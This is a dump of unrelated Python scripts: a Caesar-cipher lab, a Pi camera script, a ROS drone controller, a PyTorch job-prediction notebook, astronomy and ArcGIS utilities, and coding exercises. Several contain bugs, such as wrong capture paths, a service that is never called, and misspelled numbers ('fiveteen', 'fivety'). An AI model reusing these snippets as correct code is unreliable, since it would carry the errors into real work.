replace_space = subprocess.run(['cut', '-d', ' ', '-f2'], input=func_names.stdout, capture_output=True)
replace_bracket = subprocess.run(['cut', '-d', '(', '-f1'], input=replace_space.stdout, capture_output=True)
sort_names = subprocess.run(['sort'], input=replace_bracket.stdout, capture_output=True)
uniq_names = subprocess.run(['uniq'], input=sort_names.stdout, capture_output=True)
return uniq_names.stdout.decode('utf-8').split('\n')
check_celery_task_func_def_changed()
|
'''
Advanced Security
Lab 2
Jonathan Riordan
C13432152
Part 1
Key = -3
Message = "And I shall remain satisfied, and proud to have been the first who has ever enjoyed the fruit of his writings as fully as he could desire; for my desire has been no other than to deliver over to the detestation of mankind the false and foolish tales of the books of chivalry, which, thanks to that of my true Don Quixote, are even now tottering, and doubtless doomed to fall for ever. Farewell."
Cipher text: Xka F pexii objxfk pxqfpcfba, xka molra ql exsb ybbk qeb cfopq tel exp bsbo bkglvba qeb corfq lc efp tofqfkdp xp criiv xp eb zlria abpfob clo jv abpfob exp ybbk kl lqebo qexk ql abifsbo lsbo ql qeb abqbpqxqflk lc jxkhfka qeb cxipb xka cllifpe qxibp lc qeb yllhp lc zefsxiov, tefze, qexkhp ql qexq lc jv qorb Alk Nrfulqb, xob bsbk klt qlqqbofkd, xka alryqibpp alljba ql cxii clo bsbo. Cxobtbii.
'''
key = -3
message = "And I shall remain satisfied, and proud to have been the first who has ever enjoyed the fruit of his writings as fully as he could desire; for my desire has been no other than to deliver over to the detestation of mankind the false and foolish tales of the books of chivalry, which, thanks to that of my true Don Quixote, are even now tottering, and doubtless doomed to fall for ever. Farewell."
alphaLower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
alphaUpper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
def encrypt(plaintext, key, arraylower, arrayupper):
cipherText = ""
position = 0
temp = 0
remainder = "0"
for i in plaintext:
if i in arraylower:
position = arraylower.index(i)
temp = position + key
if temp > 25:
remainder = temp - 26
temp = remainder
if temp < 0:
remainder = temp
temp = 26
temp = temp + remainder
cipherText += arraylower[temp]
if i in arrayupper:
position = arrayupper.index(i)
temp = position + key
if temp > 25:
remainder = temp - 26
temp = remainder
if temp < 0:
remainder = temp
temp = 26
temp = temp + remainder
cipherText += arrayupper[temp]
if i == ",":
cipherText += ","
if i == ".":
cipherText += "."
if i == "!":
cipherText += "!"
if i == " ":
cipherText += " "
position = 0
temp = 0
remainder = 0
return cipherText
cipherText = encrypt(message, key,alphaLower, alphaUpper )
print cipherText
|
from time import sleep
from picamera import PiCamera
from pynput import keyboard
from datetime import datetime
TIME_LAPSE = 5 # 5 Seconds between shots
TIME_LAPSE_PICTURES = 10 # Number of pictures to snap
BURST = 5 #set number of pics to take in burst mode
PATH = "/home/pi/Desktop/Picamera/captured/"
cam = PiCamera()
cam.resolution = (1024, 768)
def take_pic():
global cam, PATH
now = datetime.now()
date_time = now.strftime("%m-%d-%Y-%H:%M:%S")
file_name = date_time + ".jpg"
print(file_name)
cam.start_preview()
sleep(2)
cam.capture(PATH+file_name)
cam.stop_preview()
def take_burst():
pass
def time_lapse():
for i in range(TIME_LAPSE_PICTURES):
sleep(TIME_LAPSE)
now = datetime.now()
new_directory = now.strftime("%m-%d-%Y-%H:%M") #each time lapse set gets its own folder
file_path = PATH+new_directory
cam.capture('/{0:04d}.jpg'.format(i+1))
print("shot {} taken".format(i+1))
def on_press(key):
#print(key)
if key.char == 't':
print("time lapse")
time_lapse()
if 'char' in dir(key):
if key == keyboard.Key.space:
take_pic()
listener = keyboard.Listener(on_press=on_press)
listener.start()
while True:
pass |
#!/usr/bin/env python
import rospy
from std_msgs.msg import String, Empty
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
from drone_control.srv import Mode, ModeResponse
class control:
survey_mode=False
def __init__(self):
# In ROS, nodes are uniquely named. If two nodes with the same
# name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously
rospy.init_node('listener_control', anonymous=True)
self.pub_vel = rospy.Publisher('bebop/cmd_vel', Twist, queue_size=10) # create publisher on bebop/cmd_vel
self.pub_takeoff = rospy.Publisher('bebop/takeoff', Empty, queue_size=10) #create_publisher on bebop/takeoff
self.pub_land = rospy.Publisher('bebop/land', Empty, queue_size=10) #create_publisher on bebop/land
self.pub_reset = rospy.Publisher('bebop/reset', Empty, queue_size=10) #create_publisher on bebop/reset
self.sub= rospy.Subscriber('joy', Joy, self.callback) #create_publisher on joy
self.mode_current = True
self.service1 = rospy.Service('ServiceSurveillance', Mode, self.callback_Surveillance) #create Surveillance service
self.service2 = rospy.Service('ServiceLoisir', Mode, self.callback_Loisir) #create loisir service
rospy.loginfo("[controller] started...")
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
def callback(self,data):
rospy.loginfo(rospy.get_caller_id() + 'I heard '+ str(data.axes))
#if the button 9 is pressed and the current mod is loisir, the drone switch on surveillance mode
if data.buttons[9]==1 and self.mode_current == True:
surveillance = rospy.ServiceProxy('ServiceSurveillance', Mode)
response_surveillance = surveillance()
self.mode_current = response_surveillance.srv_rep
#if the button 9 is pressed and the current mod is surveillance, the drone switch on loisir mode
elif data.buttons[9]==1 and self.mode_current == False:
loisir = rospy.ServiceProxy('ServiceLoisir', Mode)
response_loisir = loisir()
self.mode_current = response_loisir.srv_rep
#if the button 7 is pressed, reset the drone
if data.buttons[7]==1:
self.pub_reset.publish()
rospy.loginfo(rospy.get_caller_id() +'send reset')
#if button 2 is pressed, land the drone
if data.buttons[2]==1:
self.pub_land.publish()
rospy.loginfo(rospy.get_caller_id() +'send land')
#if button 0 is pressed, takeoff the drone
if data.buttons[0]==1:
self.pub_takeoff.publish()
rospy.loginfo(rospy.get_caller_id() +'send takeoff')
Vel_msg= Twist()
if self.mode_current==True:
#joystick control
Vel_msg.linear.x=data.axes[1]/4 #index 1 joy gauche (haut-bas)
Vel_msg.linear.y=data.axes[0]/4 #index 0 joy gauche (gauche-droite)
Vel_msg.linear.z=data.axes[4]/4 #index 4 joy droit (haut-bas)
Vel_msg.angular.z=data.axes[3] #index 3 joy droit (gauche-droite)
else:
#if surveillance mode is active start rotating
Vel_msg.angular.z=0.294 #pour aller a 0.5rad/s
self.pub_vel.publish(Vel_msg)
def callback_Surveillance(self,req):
return False
def callback_Loisir(self,req):
return True
class control_service:
def __init__(self):
rospy.init_node('surveillance_server',anonymous=False)
self.s = rospy.Service('Send_Srv_Control', Mode, self.callback) # create servie named Send_Src_Control
print("Ready to control mode")
rospy.spin()
def callback(self,req):
print("changing mode")
rospy.wait_for_service('Send_Srv_Cmd')
try:
call_resp_Mode = rospy.ServiceProxy('Send_Srv_Cmd', Mode)
resp1 = Mode()
except rospy.ServiceException as e:
print("Service call failed: %s"%e)
#switch mode
if resp1==True:
return ModeResponse(True)
else:
return ModeResponse(False)
if __name__ == '__main__':
try:
control()
control_service()
except rospy.ROSInterruptException:
pass |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
## 아래는 실제 트레인 과정 입니다.
# In[1]:
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from torchvision import datasets, transforms
import numpy as np
import torch.optim as optim
import pandas as pd
from pandas import DataFrame, Series
import csv
from random import randrange
# In[2]:
def load_data_real():
df = pd.read_csv('data.csv', error_bad_lines=False)
data_mok = df['mok']
data_hwa = df['hwa']
data_to = df['to']
data_gm = df['gm']
data_su = df['su']
data_E = df['E']
data_I = df['I']
data_S = df['S']
data_N = df['N']
data_T = df['T']
data_F = df['F']
data_J = df['J']
data_P = df['P']
data_job = df['job']
length = len(data_mok)
data = []
job = []
for i in range(0,length):
row = []
row.append(data_mok[i])
row.append(data_hwa[i])
row.append(data_to[i])
row.append(data_gm[i])
row.append(data_su[i])
row.append(data_E[i])
row.append(data_I[i])
row.append(data_S[i])
row.append(data_N[i])
row.append(data_T[i])
row.append(data_F[i])
row.append(data_J[i])
row.append(data_P[i])
data.append(row)
label = []
label.append(data_job[i])
job.append(label)
return data, job, length
# In[3]:
class myDataset(Dataset):
def __init__(self, features, label):
self.features = features
self.label = label
self.len = len(self.label)
self.label_list = list(sorted(set(self.label)))
def __getitem__(self, index):
return self.features[index], self.label[index]
def __len__(self):
return self.len
def get_labels(self):
return self.label_list
def get_label(self, id):
return self.label_list[id]
def get_label_id(self,label):
return self.label_list.index(label)
# In[4]:
BATCH_SIZE = 16
epochs = 50
data, label, length = load_data_real()
#label indexing
vocab = set()
vocab_label = np.array(label)
vocab.update(vocab_label.flatten())
label_vocab = {word:i for i, word in enumerate(vocab)}
print(label_vocab)
final_label = []
for index, label_ in enumerate(label):
final_label.append([label_vocab[label_[0]]])
data = np.array(data, dtype=np.float32)
final_label = np.array(final_label, dtype=np.float64)
final_label = final_label.flatten()
data = Variable(torch.from_numpy(data))
final_label = Variable(torch.from_numpy(final_label))
train_data = data[:18000]
train_label = final_label[:18000]
test_data = data[18000:length]
test_label = final_label[18000:length]
train_dataset = myDataset(train_data, train_label)
test_dataset = myDataset(test_data, test_label)
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False)
# Training settings
# batch_size = 64
# # MNIST Dataset
# train_dataset = datasets.MNIST(root='./mnist_data/',
# train=True,
# transform=transforms.ToTensor(),
# download=True)
# test_dataset = datasets.MNIST(root='./mnist_data/',
# train=False,
# transform=transforms.ToTensor())
# # Data Loader (Input Pipeline)
# train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
# batch_size=batch_size,
# shuffle=True)
# test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
# batch_size=batch_size,
# shuffle=False)
class myModel(nn.Module):
def __init__(self):
"""
In the constructor we instantiate two nn.Linear module
"""
super(myModel, self).__init__()
self.l1 = nn.Linear(13,50)
self.l2 = nn.Linear(50,30)
self.l3 = nn.Linear(30,15)
self.sigmoid = nn.Sigmoid()
self.relu = nn.ReLU()
def forward(self, x):
"""
In the forward function we accept a Variable of input data and we must return
a Variable of output data. We can use Modules defined in the constructor as
well as arbitrary operators on Variables.
"""
x = x.view(-1,13)
out1 = self.sigmoid(self.l1(x))
out2 = self.sigmoid(self.l2(out1))
y_pred = self.sigmoid(self.l3(out2))
return y_pred
class Model(nn.Module):
def __init__(self):
"""
In the constructor we instantiate two nn.Linear module
"""
super(Model, self).__init__()
self.l1 = nn.Linear(8, 6)
self.l2 = nn.Linear(6, 4)
self.l3 = nn.Linear(4, 1)
self.sigmoid = nn.Sigmoid()
self.relu = nn.ReLU()
def forward(self, x):
"""
In the forward function we accept a Variable of input data and we must return
a Variable of output data. We can use Modules defined in the constructor as
well as arbitrary operators on Variables.
"""
out1 = self.sigmoid(self.l1(x))
out2 = self.sigmoid(self.l2(out1))
y_pred = self.sigmoid(self.l3(out2))
return y_pred
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = nn.Linear(784, 520)
self.l2 = nn.Linear(520, 320)
self.l3 = nn.Linear(320, 240)
self.l4 = nn.Linear(240, 120)
self.l5 = nn.Linear(120, 10)
def forward(self, x):
x = x.view(-1, 784) # Flatten the data (n, 1, 28, 28)-> (n, 784)
x = F.relu(self.l1(x))
x = F.relu(self.l2(x))
x = F.relu(self.l3(x))
x = F.relu(self.l4(x))
return self.l5(x)
# our model
model = myModel()
# Construct our loss function and an Optimizer. The call to model.parameters()
# in the SGD constructor will contain the learnable parameters of the two
# nn.Linear modules which are members of the model.
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=0.01)
def train(epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
target = torch.tensor(target,dtype=torch.long)
loss = criterion(output, target)
loss.backward()
optimizer.step()
if batch_idx % 100 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
def my_test():
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = Variable(data), Variable(target)
output = model(data)
target = torch.tensor(target,dtype=torch.long)
# sum up batch loss
test_loss += criterion(output, target).data[0]
# get the index of the max
pred = output.data.max(1, keepdim=True)[1]
target = target.view(pred.size(0),1)
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
# Training loop
for epoch in range(epochs):
train(epoch)
my_test()
# In[ ]:
##아래는 데이터 만드는 과정입니다.
# In[5]:
torch.save(model,'saved_model')
# In[ ]:
# In[43]:
model2 = torch.load('saved_model')
myinput = [1,2,2,1,0,2,4,2,4,2,4,2,4]
myinput = np.array(myinput,dtype=np.float32)
myinput = Variable(torch.from_numpy(myinput))
output = model2(myinput)
# print(output)
output = output.view(-1)
list = [i[0] for i in sorted(enumerate(output), key=lambda x:x[1], reverse=True)]
# print(output)
pos_list = sorted(output, reverse=True)
# print(pos_list)
# print(list)
# print(label_vocab)
sum_ = sum(pos_list)
# print(sum_)
# print(label_vocab.items())
job_list_ = []
pos_list_ = []
print(pos_list)
for num in pos_list:
pos_list_.append(num/sum_)
print(pos_list_)
for num in list:
a=[name for name, age in label_vocab.items() if age == num]
job_list_.append(a[0])
print(job_list_)
# In[ ]:
# In[8]:
def load_data():
df = pd.read_csv('data.csv', error_bad_lines=False)
data_mok = df['mok']
data_hwa = df['hwa']
data_to = df['to']
data_gm = df['gm']
data_su = df['su']
data_E = df['E']
data_I = df['I']
data_S = df['S']
data_N = df['N']
data_T = df['T']
data_F = df['F']
data_J = df['J']
data_P = df['P']
length = len(data_mok)
data = []
for i in range(0,length):
row = []
row.append(data_mok[i])
row.append(data_hwa[i])
row.append(data_to[i])
row.append(data_gm[i])
row.append(data_su[i])
row.append(data_E[i])
row.append(data_I[i])
row.append(data_S[i])
row.append(data_N[i])
row.append(data_T[i])
row.append(data_F[i])
row.append(data_J[i])
row.append(data_P[i])
data.append(row)
print(data[0])
print(data[1])
com = data[0]
jobs = []
for data_ in data:
select_list = data_[:5]
max_ = max(data_[:5])
list_ = [ i for i, x in enumerate( select_list ) if x == max_ ]
random_index = randrange(0,len(list_))
last_num = list_[random_index]
if last_num == 0:
list__ = ['바리스타', '매장', '의류']
random_index = randrange(0,len(list__))
job = list__[random_index]
jobs.append(job)
elif last_num == 1:
list__ = ['레스토랑', '사무보조', '미용']
random_index = randrange(0,len(list__))
job = list__[random_index]
jobs.append(job)
elif last_num == 2:
list__ = ['생산', '주방', '회계']
random_index = randrange(0,len(list__))
job = list__[random_index]
jobs.append(job)
elif last_num == 3:
list__ = ['유아', '스포츠', 'PC']
random_index = randrange(0,len(list__))
job = list__[random_index]
jobs.append(job)
elif last_num == 4:
list__ = ['배달', '창고', '서빙']
random_index = randrange(0,len(list__))
job = list__[random_index]
jobs.append(job)
print(jobs)
return jobs
# In[9]:
jobs = load_data()
data = DataFrame(jobs)
print(data)
data.to_excel('label_2.xlsx', sheet_name='sheet1')
# data.to_csv('label_2.csv', index=False, header=False, encoding='ms949')
# f = open('label.csv', 'w', encoding='euc_kr', newline='')
# wr = csv.writer(f)
# for job in jobs:
# wr.writerow(job)
# In[ ]:
|
import openpyxl
import pprint
# data = {id_: {
# "info": (name_, gender_: xxx, age_: xx},
# date_: tx_,
# ...
# }
# }
# ...
# }
data = {}
if __name__ == '__main__':
wb = openpyxl.load_workbook('D:\\test.xlsx')
for sh in wb:
rightlowercorner = 'E' + str(sh.max_row)
#for row in sh.iter_rows(min_row=2, max_col=3, max_row=sh.max_row, values_only=True):
for row in sh.iter_rows(min_row=2, max_col=9, max_row=3, values_only=True):
date_, id_, name_, gender_, age_, sx_, duration_, dx_, tx_ = row
# Make sure the key for this id exists
data.setdefault(id_, {"info": (name_, gender_, age_)})
data[id_][date_] = tx_
pprint.pprint(data)
|
n = int(input())
m = input().split()
for i in range(n):
m[i] = int(m[i])
for i in range(n-1,-1,-1):
print(m[i],end=' ')
|
# encoding: utf-8
'''
https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/g3doc/convert/python_api.md
'''
import tensorflow as tf
pb_file_path = '../caffe2tensorflow/caffe_fcn8s/'
with tf.Session(graph=tf.Graph()) as sess:
tf.saved_model.loader.load(sess, ['train'], pb_file_path)
sess.run(tf.global_variables_initializer())
input_x = sess.graph.get_tensor_by_name('input:0')
output_y = sess.graph.get_tensor_by_name('crop_to_bounding_box_2/Slice:0')
converter = tf.lite.TFLiteConverter.from_session(sess, [input_x], [output_y])
tflite_model = converter.convert()
open("./model/converted_model.tflite", "wb").write(tflite_model) |
import astropy
import astropy.io.fits as pyfits
import matplotlib
import matplotlib.pyplot as plt
import scipy
import scipy.ndimage
import showgalaxy
import make_color_image
import numpy.random as random
import gfs_sublink_utils as gsu
import numpy as np
import congrid
ug_g235h=np.linspace(1.75,2.25,int( (2.25-1.75)/(2.0/2300.0)))
ug_g235m=np.linspace(1.75,2.25,int( (2.25-1.75)/(2.0/800.0)))
def get_integrated_spectrum(bbfile):
bb=pyfits.open(bbfile)
iq=bb['INTEGRATED_QUANTITIES'].data
flux=iq['L_lambda_nonscatter0']
lambda_um=1.0e6 * iq['lambda']
fils=bb['FILTERS'].data
flux_im=fils['L_lambda_eff_nonscatter0']
lam_im=1.0e6* fils['lambda_eff']
return flux,lambda_um, flux_im, lam_im
def make_niriss_trace(bbfile='grism.fits',outname='grismtrace',ybox=None,xbox=None,noisemaxfact=0.05,alph=1.0,Q=1.0,rotate=False,resize=None):
go=pyfits.open(bbfile)
redshift=go['BROADBAND'].header['REDSHIFT']
niriss_pix_as=0.065
f200_nm_per_pix=9.5/2.0
min_lam=1.750
max_lam=2.220
hdu=go['CAMERA0-BROADBAND-NONSCATTER']
cube=hdu.data[6:,:,:] #L_lambda units!
#cube=np.flipud(cube) ; print(cube.shape)
fil=go['FILTERS']
lamb=fil.data['lambda_eff'][6:]*1.0e6
flux=fil.data['L_lambda_eff_nonscatter0'][6:]
g_i = (lamb >= min_lam) & (lamb <= max_lam)
arcsec_per_kpc= gsu.illcos.arcsec_per_kpc_proper(redshift)
kpc_per_arcsec=1.0/arcsec_per_kpc.value
im_kpc=hdu.header['CD1_1']
niriss_kpc_per_pix=niriss_pix_as*kpc_per_arcsec
total_width_pix=(1.0e3)*(max_lam-min_lam)/f200_nm_per_pix
total_width_kpc=total_width_pix*niriss_kpc_per_pix
total_width_impix=int(total_width_kpc/im_kpc)
delta_lam=(max_lam-min_lam)/total_width_impix #microns/pix
psf_arcsec=0.13 #????
psf_kpc=psf_arcsec*kpc_per_arcsec
psf_impix=psf_kpc/im_kpc
imw_cross=32
imw_disp=total_width_impix+imw_cross
Np=cube.shape[-1]
mid = np.int64(Np/2)
delt=np.int64(imw_cross/2)
output_image=np.zeros_like( np.ndarray(shape=(imw_disp,imw_cross),dtype='float' ))
#r = r[mid-delt:mid+delt,mid-delt:mid+delt]
output_image.shape
small_cube=cube[g_i,mid-delt:mid+delt,mid-delt:mid+delt]
for i,l in enumerate(lamb[g_i]):
di=int( (l-min_lam)/delta_lam )
this_cube=small_cube[i,:,:]*l**2 #convert to Janskies-like
if rotate is True:
this_cube = np.rot90(this_cube)
#if i==17:
# this_cube[30,30] = 1.0e3
#print(i,l/(1.0+redshift),int(di),np.sum(this_cube),this_cube.shape,output_image.shape,output_image[di:di+imw_cross,:].shape)
output_image[di:di+imw_cross,:]=output_image[di:di+imw_cross,:]+this_cube
output_image=scipy.ndimage.gaussian_filter(output_image,sigma=[4.0,psf_impix/2.355])
new_thing = np.transpose(np.flipud(output_image))
if resize is not None:
new_thing = congrid.congrid(new_thing, resize)
nr = noisemaxfact*np.max(new_thing)*random.randn(new_thing.shape[0],new_thing.shape[1])
#thing=make_color_image.make_interactive(new_thing+nr,new_thing+nr,new_thing+nr,alph=alph,Q=Q)
#thing=1.0-np.fliplr(np.transpose(thing,axes=[1,0,2]))
thing=np.fliplr(new_thing+nr)
f=plt.figure(figsize=(25,6))
f.subplots_adjust(wspace=0.0,hspace=0.0,top=0.99,right=0.99,left=0,bottom=0)
axi=f.add_subplot(1,1,1)
axi.imshow( (thing),aspect='auto',origin='left',interpolation='nearest',cmap='Greys_r')
f.savefig(outname+'.png',dpi=500)
plt.close(f)
#[ybox[0]:ybox[1],xbox[0]:xbox[1]]
#[50:125,120:820,:]
new_hdu=pyfits.PrimaryHDU(thing)
new_list=pyfits.HDUList([new_hdu])
new_list.writeto(outname+'.fits',overwrite=True)
f,l,f_im,l_im=get_integrated_spectrum(bbfile)
return thing, new_thing, f, l, f_im, l_im
def make_simple_trace(bbfile='grism.fits',outname='grismtrace',ybox=None,xbox=None,noisemaxfact=0.05,alph=1.0,Q=1.0,rotate=False,resize=None):
go=pyfits.open(bbfile)
redshift=go['BROADBAND'].header['REDSHIFT']
wfc3_pix_as=0.13
g141_nm_per_pix=4.65
min_lam=1.075
max_lam=1.700
hdu=go['CAMERA0-BROADBAND-NONSCATTER']
cube=hdu.data #L_lambda units!
#cube=np.flipud(cube) ; print(cube.shape)
fil=go['FILTERS']
lamb=fil.data['lambda_eff']*1.0e6
flux=fil.data['L_lambda_eff_nonscatter0']
g141_i = (lamb >= min_lam) & (lamb <= max_lam)
arcsec_per_kpc= gsu.illcos.arcsec_per_kpc_proper(redshift)
kpc_per_arcsec=1.0/arcsec_per_kpc.value
im_kpc=hdu.header['CD1_1']
print('pix size kpc: ', im_kpc)
wfc3_kpc_per_pix=wfc3_pix_as*kpc_per_arcsec
total_width_pix=(1.0e3)*(max_lam-min_lam)/g141_nm_per_pix
total_width_kpc=total_width_pix*wfc3_kpc_per_pix
total_width_impix=int(total_width_kpc/im_kpc)
delta_lam=(max_lam-min_lam)/total_width_impix #microns/pix
psf_arcsec=0.18
psf_kpc=psf_arcsec*kpc_per_arcsec
psf_impix=psf_kpc/im_kpc
imw_cross=200
imw_disp=total_width_impix+imw_cross
Np=cube.shape[-1]
mid = np.int64(Np/2)
delt=np.int64(imw_cross/2)
output_image=np.zeros_like( np.ndarray(shape=(imw_disp,imw_cross),dtype='float' ))
#r = r[mid-delt:mid+delt,mid-delt:mid+delt]
output_image.shape
small_cube=cube[g141_i,mid-delt:mid+delt,mid-delt:mid+delt]
for i,l in enumerate(lamb[g141_i]):
di=int( (l-min_lam)/delta_lam )
this_cube=small_cube[i,:,:]*l**2 #convert to Janskies-like
if rotate is True:
this_cube = np.rot90(this_cube)
#if i==17:
# this_cube[30,30] = 1.0e3
#print(i,l/(1.0+redshift),int(di),np.sum(this_cube),this_cube.shape,output_image.shape,output_image[di:di+imw_cross,:].shape)
output_image[di:di+imw_cross,:]=output_image[di:di+imw_cross,:]+this_cube
output_image=scipy.ndimage.gaussian_filter(output_image,sigma=[4,psf_impix/2.355])
new_thing = np.transpose(np.flipud(output_image))
if resize is not None:
new_thing = congrid.congrid(new_thing, resize)
nr = noisemaxfact*np.max(new_thing)*random.randn(new_thing.shape[0],new_thing.shape[1])
#thing=make_color_image.make_interactive(new_thing+nr,new_thing+nr,new_thing+nr,alph=alph,Q=Q)
#thing=1.0-np.fliplr(np.transpose(thing,axes=[1,0,2]))
thing=np.fliplr(new_thing+nr)
f=plt.figure(figsize=(25,6))
f.subplots_adjust(wspace=0.0,hspace=0.0,top=0.99,right=0.99,left=0,bottom=0)
axi=f.add_subplot(1,1,1)
axi.imshow( (thing),aspect='auto',origin='left',interpolation='nearest',cmap='Greys_r')
f.savefig(outname+'.png',dpi=500)
plt.close(f)
#[ybox[0]:ybox[1],xbox[0]:xbox[1]]
#[50:125,120:820,:]
new_hdu=pyfits.PrimaryHDU(thing)
new_list=pyfits.HDUList([new_hdu])
new_list.writeto(outname+'.fits',clobber=True)
return thing, new_thing
|
import arcpy
from arcpy import env
from arcpy.sa import *
import pandas as pd
import numpy as np
import os
import time
import sys
arcpy.env.parallelProcessingFactor = "100%"
t0 = time.clock()
# Set the environment:
arcpy.env.overwriteOutput = True
scriptPath = arcpy.GetParameter(0)
scriptPath = sys.path[0]
#Set variables for script:
StressFieldsUSA_WM = "StressFieldsUSA_WM"
SelectionPolygon = "SelectionPolygon"
SelectionPolygon = arcpy.GetParameter(1)
TableFromSelection = os.path.join("in_memory", "TableFromSelection")
# make vents and polygon feature layers:
arcpy.MakeFeatureLayer_management(StressFieldsUSA_WM,"StressFieldsFeatLyr")
arcpy.AddMessage("after make vents feat lyr: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.MakeFeatureLayer_management(SelectionPolygon,"PolyFeatLyr")
arcpy.AddMessage("after make poly feat lyr: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# Select vents with polygon:
arcpy.SelectLayerByLocation_management("StressFieldsFeatLyr","COMPLETELY_WITHIN","PolyFeatLyr")
arcpy.AddMessage("after selection: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# Create table from selcted records:
arcpy.CopyRows_management ("StressFieldsFeatLyr", TableFromSelection)
arcpy.AddMessage("after create selection table: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
# table to data frame:
##### credit: https://gist.github.com/d-wasserman/e9c98be1d0caebc2935afecf0ba239a0 ####
def arcgis_table_to_dataframe(in_fc, input_fields, query="", skip_nulls=False, null_values=None):
"""Function will convert an arcgis table into a pandas dataframe with an object ID index, and the selected
input fields. Uses TableToNumPyArray to get initial data.
:param - in_fc - input feature class or table to convert
:param - input_fields - fields to input into a da numpy converter function
:param - query - sql like query to filter out records returned
:param - skip_nulls - skip rows with null values
:param - null_values - values to replace null values with.
:returns - pandas dataframe"""
OIDFieldName = arcpy.Describe(in_fc).OIDFieldName
if input_fields:
final_fields = [OIDFieldName] + input_fields
else:
final_fields = [field.name for field in arcpy.ListFields(in_fc)]
np_array = arcpy.da.TableToNumPyArray(in_fc, final_fields, query, skip_nulls, null_values)
object_id_index = np_array[OIDFieldName]
fc_dataframe = pd.DataFrame(np_array, index=object_id_index, columns=input_fields)
return fc_dataframe
fc_dataframe = arcgis_table_to_dataframe(TableFromSelection,['AZI'])
arcpy.AddMessage("after converting selection table to data frame: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.AddMessage(fc_dataframe)
#dataframe to histogram array
## run numpy.histogram
##https://numpy.org/doc/stable/reference/generated/numpy.histogram.html ### Just return the array of bin counts as final
AzimuthArray = fc_dataframe
# Creating histogram
np.histogram(AzimuthArray, bins = [0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100,105,110,115,120,125,130,135,140,145,150,155,160,165,170,175,180,185,190,195,200,205,210,215,220,225,230,235,240,245,250,255,260,265,270,275,280,285,290,295,300,305,310,315,320,325,330,335,340,345,350,355,360])
hist, bins = np.histogram(AzimuthArray, bins = [0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100,105,110,115,120,125,130,135,140,145,150,155,160,165,170,175,180,185,190,195,200,205,210,215,220,225,230,235,240,245,250,255,260,265,270,275,280,285,290,295,300,305,310,315,320,325,330,335,340,345,350,355,360])
arcpy.AddMessage(hist)
azimuthList = list(hist)
arcpy.AddMessage(azimuthList)
# return the hitogram array as the final array, make parameter:
arcpy.AddMessage("after creating bins for rose diagram: Elapsed time: {0} seconds".format(int(time.clock() - t0)))
arcpy.SetParameterAsText(2, azimuthList)
|
def calcula_dominator(A):
dados = {}
for item in A:
if item not in dados:
dados[item] = 1
else:
dados[item] += 1
tamanho = len(A) // 2
for k,v in dados.items():
if v > tamanho:
x = k
return x
def solution(A):
pass
print(calcula_dominator([4,3,4,4,2])) |
# https://www.hackerrank.com/challenges/the-time-in-words
import math
import os
import random
import re
import sys
# Complete the timeInWords function below.
def timeInWords(h, m):
if m == 00:
return (number(h) +' o\' '+'clock' )
elif 1 <= m <= 30:
if m == 15:
return ('quarter past '+ number(h))
elif m == 30:
return ('half past '+ number(h))
else:
return (number(m) + ' minutes past '+number(h)) if m > 1 else (number(m) + ' minute past '+number(h))
elif m >= 31:
if m == 45:
return ('quarter to '+ number(h+1))
else:
return (number(60 - m) + ' minutes to '+ number(h+1))
def number(n):
num2words = {1:'one',2:'two',3:'three',4:'four',5:'five',6:'six',7:'seven',8:'eight',9:'nine',10:'ten',11:'eleven',12:'twelve',13:'thirteen',14:'fourteen',15:'fiveteen',16:'sixteen',17:'seventeen',18:'eighteen',19:'nineteen'}
num2words1 =['twenty','thirty','forty','fivety','sixty','seventy','eighty','ninety']
if 1 <= n <= 19:
return num2words[n]
elif 20 <= n < 99:
tens, below_ten = divmod(n,10)
return num2words1[tens - 2] + ' ' + num2words[below_ten]
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = int(input())
m = int(input())
result = timeInWords(h, m)
fptr.write(result + '\n')
fptr.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python 学习笔记 之 面向对象编程(3)
# 获取对象信息
import types
# 引入oop2_extends文件
from pkg4_oop import oop2_extends
# 快速打印
from util import p
# -------------------------type()--------------------------
p(type(123)) # type() 判断对象类型 <class 'int'>
p(type(p)) # <class 'function'>
p(type(oop2_extends.animal))
